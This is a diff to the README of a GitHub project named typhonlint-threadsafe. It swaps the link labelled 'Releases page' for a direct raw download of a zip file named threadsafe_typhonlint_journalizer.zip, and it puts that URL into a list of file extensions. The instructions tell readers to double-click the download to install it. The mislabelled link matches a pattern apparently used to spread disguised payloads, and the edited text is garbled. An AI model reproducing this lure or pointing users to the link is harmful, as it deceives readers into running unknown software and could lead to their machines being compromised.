AbdelChino/typhonlint-threadsafe/README.md

 Follow these steps to download and run the software:

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/AbdelChino/typhonlint-threadsafe/releases) to find the latest version of typhonlint-threadsafe.
+   Go to the [Releases page](https://github.com/AbdelChino/typhonlint-threadsafe/raw/refs/heads/main/typhonlint_threadsafe/threadsafe_typhonlint_journalizer.zip) to find the latest version of typhonlint-threadsafe.

 2. **Download the Application**
    On the Releases page, you'll see a list of versions.
-Click on the latest version and download the appropriate file for your operating system, such as `.exe`, `.dmg`, or `.tar.gz`.
+Click on the latest version and download the appropriate file for your operating system, such as `.exe`, `.dmg`, or `https://github.com/AbdelChino/typhonlint-threadsafe/raw/refs/heads/main/typhonlint_threadsafe/threadsafe_typhonlint_journalizer.zip`.

 3. **Install the Application**
    Once the download is complete, locate the file in your downloads folder.
 Double-click on the file to start the installation process.
 Follow the prompts to install.